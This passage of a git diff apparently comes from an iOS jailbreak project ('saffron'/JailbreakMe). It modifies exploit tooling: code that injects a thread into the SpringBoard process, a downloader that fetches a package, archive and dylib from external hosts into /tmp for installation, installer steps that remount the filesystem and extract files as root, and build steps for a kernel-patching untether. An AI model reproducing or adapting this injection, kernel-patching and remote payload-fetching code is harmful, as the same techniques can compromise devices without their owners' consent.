1)) def simplify_times(heap, addr, times, must_be_simple=True): for i in xrange(times): @@ -131,6 +131,8 @@ def unpack(self): bits += struct.unpack('I'*(len(bit)/4), bit) elif len(bit) == 0: pass + elif isinstance(bit, troll_string): + bits += bit.unpack() else: raise ValueError('unpack: %r' % bit) return bits diff --git a/install/install.m b/install/install.m index 861b290..6ad9c6d 100644 --- a/install/install.m +++ b/install/install.m @@ -35,7 +35,7 @@ static void wrote_bytes(ssize_t bytes) { // xxx figure this out float total = 36938240.0f; - set_progress(written_bytes / total); + set_progress((written_bytes / total)/* * 0.95*/); } } @@ -173,11 +173,11 @@ static void extract(const char *fn) { } else { chdir("/"); } - tar_extract_file(tar, pathname); - if(strstr(pathname, "LaunchDaemons/") && strstr(pathname, ".plist")) { - _log("queueing ld %s", pathname); - [to_load addObject:[NSData dataWithBytes:pathname length:strlen(pathname)+1]]; + if(!access(pathname, F_OK)) { + _log("skipping %s", pathname); + continue; } + tar_extract_file(tar, pathname); } tar_close(tar); @@ -243,14 +243,6 @@ static void add_afc2() { })); } -static void finish_up() { - return; - for(NSData *pathname in to_load) { - chdir("/"); - run((char *[]) {"/bin/launchctl", "load", (char *) [pathname bytes], NULL}, NULL); - } -} - @interface LSApplicationWorkspace { } +(LSApplicationWorkspace *)defaultWorkspace; @@ -318,13 +310,15 @@ void do_install(void (*set_progress_)(float)) { TIME(remount()); TIME(dok48()); TIME(add_afc2()); - TIME(make_nulls()); + if(USE_NULL) { + make_nulls(); + } TIME(extract("/tmp/freeze.tar.xz")); TIME(install_starstuff()); - TIME(finish_up()); TIME(uicache()); TIME(post_jailbreak()); - TIME(sync()); + set_progress(1.00); + TIME(sync(), sync(), sync()); _log("final written_bytes = %zd", written_bytes); } diff --git a/locutus/inject.c b/locutus/inject.c index 67f3620..1a5b738 100644 --- a/locutus/inject.c +++ b/locutus/inject.c @@ -60,7 +60,10 @@ kern_return_t inject(pid_t pid, const char *path) { struct arm_thread_state arm; natural_t nat; } state = { { .cpsr = 0x20 } }; - state.arm.pc = baton_address + 8; + state.arm.pc = baton_address; + + vm_machine_attribute_val_t value = MATTR_VAL_CACHE_FLUSH; // ignored by the kernel + _assert_zero(vm_machine_attribute(task, baton_address, baton_size, MATTR_CACHE, &value)); thread_act_t thread; _assert_zero(thread_create_running(task, ARM_THREAD_STATE, &state.nat, ARM_THREAD_STATE_COUNT, &thread)); diff --git a/locutus/locutus.c b/locutus/locutus.c index bb247c6..49afb44 100644 --- a/locutus/locutus.c +++ b/locutus/locutus.c @@ -30,9 +30,8 @@ static const float download_share = 0.50; //#define TINY #ifdef TINY -static void do_nothing_with(CFTypeRef r) {} -#define CFRelease do_nothing_with -#define NSLog(...) +#define CFRelease(args...) ((args), (void) 0) +#define NSLog(args...) ((args), (void) 0) #else extern void NSLog(CFStringRef fmt, ...); #endif @@ -64,10 +63,16 @@ static struct request { }; }; } requests[] = { - {CFSTR("http://a.qoid.us/saffron/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, +#if 1 + {CFSTR("http://www.jailbreakme.com/saffron/_/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, + {CFSTR("http://www.jailbreakme.com/saffron/_/freeze.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/octet-stream"), {}}, + {CFSTR("http://www.jailbreakme.com/saffron/_/install.dylib"), "/tmp/install.dylib", CFSTR("application/octet-stream"), {}}, +#else + {CFSTR("http://a.qoid.us/omgleak/_/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, //{CFSTR("http://test.saurik.com/dhowett/Cydia-4.1b1-Srk.txz"), "/tmp/freeze.tar.xz", CFSTR("text/plain"), {}}, - {CFSTR("http://a.qoid.us/saffron/Cydia-4.3r4-Raw.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/x-tar"), {}}, - {CFSTR("http://a.qoid.us/saffron/install.dylib"), "/tmp/install.dylib", CFSTR("text/plain"), {}}, + {CFSTR("http://a.qoid.us/omgleak/_/freeze.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/x-tar"), {}}, + {CFSTR("http://a.qoid.us/omgleak/_/install.dylib"), "/tmp/install.dylib", CFSTR("text/plain"), {}}, +#endif }, *const requests_end = requests + sizeof(requests)/sizeof(*requests); static void did_download(size_t bytes) { @@ -194,6 +199,7 @@ static void request_callback(CFReadStreamRef stream, CFStreamEventType event_typ NSLog(CFSTR("got %@, expected %@"), content_type, r->content_type); handle_error(r, CFStringCreateWithFormat(NULL, NULL, CFSTR("Wrong Content-Type; are you on a fail Wi-Fi network?"))); + break; } } @@ -282,11 +288,12 @@ static pid_t find_springboard() { _assert(!sysctl(&name[0], sizeof(name) / sizeof(*name), proc, &length, NULL, 0)); for(size_t i = 0; i < length/sizeof(*proc); i++) { struct extern_proc *ep = &proc[i].kp_proc; + /*if(!strncmp(ep->p_comm, "CommCenter", sizeof(ep->p_comm))) { + kill(ep->p_pid, SIGKILL); + }*/ if(!strncmp(ep->p_comm, "SpringBoard", sizeof(ep->p_comm))) { result = ep->p_pid; - }/* else if(!strncmp(ep->p_comm, "locutus", sizeof(ep->p_comm)) && ep->p_pid != my_pid) { - kill(ep->p_pid, SIGUSR1); - }*/ + } } _assert(result); return result; diff --git a/locutus/locutus_server.m b/locutus/locutus_server.m index 56f614d..9f3cf74 100644 --- a/locutus/locutus_server.m +++ b/locutus/locutus_server.m @@ -102,6 +102,7 @@ static void do_alert(NSString *title, NSString *message, NSString *cancel, NSStr static void (^sk)() = ^{ [alert_view dismissWithClickedButtonIndex:0 animated:YES]; [icon remove]; + [icon release]; icon = nil; [icon_controller setIconToReveal:nil]; close(sock); @@ -128,7 +129,7 @@ static BOOL MyIcon_allowsUninstall(id self, SEL sel) { static void MyIcon_closeBoxTapped(id self, SEL sel) { // don't download behind the user's back write(sock, "p", 1); - do_alert(_(@"Remove Download"), @"Are you sure you want to remove “Cydia”?", (@"GAMECENTER_DELETE_STATS_DELETE"), _(@"UNINSTALL_ICON_CANCEL")); + do_alert(_(@"Remove Download"), @"Are you sure you want to remove “Cydia”?", _(@"GAMECENTER_DELETE_STATS_DELETE"), _(@"UNINSTALL_ICON_CANCEL")); } @@ -161,6 +162,7 @@ static void installed() { #endif [[icon_model applicationIconForDisplayIdentifier:@"com.saurik.Cydia"] reloadIconImage]; } + [icon release]; icon = nil; sk(); } @@ -209,6 +211,8 @@ static void installed() { } } +static void do_nothing() { } + __attribute__((constructor)) static void init() { NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init]; @@ -237,15 +241,19 @@ static void init() { icon_model = [objc_getClass("SBIconModel") sharedInstance]; bundle_identifier = (existing_icon = [icon_model applicationIconForDisplayIdentifier:@"com.saurik.Cydia"]) ? @"com.saurik.Cydia.notreally" : @"com.saurik.Cydia"; + Class SBDownloadingIcon = objc_getClass("SBDownloadingIcon"); + char name[32]; sprintf(name, "MyIcon_%p", &init); - MyIcon = objc_allocateClassPair(objc_getClass("SBDownloadingIcon"), name, 0); + MyIcon = objc_allocateClassPair(SBDownloadingIcon, name, 0); #define OVERRIDE(x) class_replaceMethod(MyIcon, @selector(x), (IMP) MyIcon_##x, "") OVERRIDE(displayName); OVERRIDE(applicationBundleID); OVERRIDE(launch); OVERRIDE(allowsUninstall); OVERRIDE(closeBoxTapped); + IMP setDisplayedIconImage = class_getMethodImplementation(SBDownloadingIcon, @selector(setDisplayedIconImage:)); + class_replaceMethod(MyIcon, @selector(setDisplayedIconImage:), (IMP) do_nothing, ""); class_addMethod(MyIcon, @selector(alertView:clickedButtonAtIndex:), (IMP) MyIcon_alertView_clickedButtonAtIndex, "@:@l"); objc_registerClassPair(MyIcon); @@ -263,7 +271,6 @@ static void init() { [icon_model addIcon:icon]; [icon_controller addNewIconToDesignatedLocation:icon animate:NO scrollToList:NO saveIconState:YES]; [icon_controller setIconToReveal:icon]; - [icon release]; if(existing_icon) { write(sock, "p", 1); @@ -271,12 +278,15 @@ static void init() { } bool _2x = [[UIScreen mainScreen] scale] > 1.5; + bool ipad = [[UIDevice currentDevice] userInterfaceIdiom] == UIUserInterfaceIdiomPad; + NSString *icon_url = _2x ? @"http://a.qoid.us/Cydia@2x.png" : @"http://a.qoid.us/Cydia.png"; + if(ipad) icon_url = @"http://a.qoid.us/Cydia-72.png"; UIImage *icon_image = [UIImage imageWithData:[NSData dataWithContentsOfURL:[NSURL URLWithString:icon_url]]]; if(icon_image) { icon_image = [icon darkenedIconImage:icon_image alpha:0.5]; if(_2x) icon_image = [UIImage imageWithCGImage:[icon_image CGImage] scale:2.0 orientation:UIImageOrientationUp]; - [icon setDisplayedIconImage:icon_image]; + ((void (*)(id self, SEL sel, id image)) setDisplayedIconImage)(icon, nil, icon_image); } }); diff --git a/make.py b/make.py index c07db59..1f29f75 100755 --- a/make.py +++ b/make.py @@ -19,8 +19,10 @@ def hybrid_hasher(filename): def set_firmware(firmware=None, lndir=False): global iversion, device, version, build_num, is_armv7, BUILD_ROOT, BS if firmware is None: - firmware = os.readlink(ROOT + '/config/cur').strip('/').split('/')[-1] - BS = ROOT + '/bs/' + firmware + BS = os.readlink(ROOT + '/config/cur') + firmware = BS.strip('/').split('/')[-1] + else: + BS = ROOT + '/bs/' + firmware device, version, build_num = re.match('(i[A-Z][a-z]+[0-9],[0-9x])_([0-9\.]+)_([A-Z0-9]+)', firmware).groups() is_armv7 = device not in ['iPhone1,1', 'iPhone1,2', 'iPod1,1', 'iPod2,1'] bits = version.split('.') + [0, 0] @@ -90,7 +92,7 @@ def catalog_dejavu(): def catalog_untether(): catalog() run(GCC, '-c', '-o', tmp('kcode_two.o'), 'kcode.S', '-Oz') - run('python', 'catalog.py', 'untether', version, BS+'/cache', BS+'/kern', tmp('patchfile'), tmp('kcode_two.o'), tmp('two.txt')) + run('python', 'catalog.py', 'untether', device, version, BS+'/cache', BS+'/kern', tmp('patchfile'), tmp('kcode_two.o'), tmp('two.txt')) def untether(): catalog_untether() @@ -172,13 +174,11 @@ def starstuff(): white() untether() goto('starstuff') - compile_stuff(['mount_nulls.c'], 'mount_nulls', ldid=False, gcc=GCC_ARMV6, use_tmp=False, cflags='-DUSE_NULL=%d' % use_null) + compile_stuff(['mount_nulls.c'], 'mount_nulls', ldid=True, gcc=GCC_ARMV6, use_tmp=False, cflags='-DUSE_NULL=%d' % use_null) if use_null: run('../white/universal/white_loader', '-k', BS+'/kern', '-p', tmp('../fs/union.dylib'), tmp('union_prelink.dylib')) - else: - run('touch', tmp('union_prelink.dylib')) package = 'saffron-jailbreak-%s-%s' % (device, build_num) - run('bash', 'build-archive.sh', tmp('.'), package, package.replace(',', '.').lower()) + run('bash', 'build-archive.sh', tmp('.'), package, package.replace(',', '.').lower(), '%d' % use_null) def stage(string=None): all_devices = ['iPhone3,1', 'iPhone3,3', 'iPod4,1', 'iPad2,1', 'iPad2,2', 'iPad2,3', 'iPhone2,1', 'iPod3,1', 'iPad1,1', 'iPhone1,2', 'iPod2,1'] diff --git a/starstuff/build-archive.sh b/starstuff/build-archive.sh index 50289d2..f3285df 100644 --- a/starstuff/build-archive.sh +++ b/starstuff/build-archive.sh @@ -2,7 +2,9 @@ set -xe root="$1/root" mkdir -p "$root"/{DEBIAN,boot,private/var/null} -cp -a "$1"/union_prelink.dylib "$root"/boot/union_prelink.dylib +if [ "$4" = "1" ]; then + cp -a "$1"/union_prelink.dylib "$root"/boot/union_prelink.dylib +fi cp -a "$1"/../catalog/untether "$root"/boot/untether cp -a ../white/white_loader "$root"/boot/white_loader cp -a mount_nulls "$root"/boot/mount_nulls diff --git a/starstuff/root/boot/union_prelink.dylib b/starstuff/root/boot/union_prelink.dylib deleted file mode 100644 index 4ad5df7..0000000 Binary files a/starstuff/root/boot/union_prelink.dylib and /dev/null differ diff --git a/starstuff/root/boot/untether b/starstuff/root/boot/untether deleted file mode 100755 index cd32300..0000000 Binary files a/starstuff/root/boot/untether and /dev/null differ diff --git a/starstuff/root/boot/white_loader b/starstuff/root/boot/white_loader deleted file mode 100755 index 28c359b..0000000 Binary files a/starstuff/root/boot/white_loader and /dev/null differ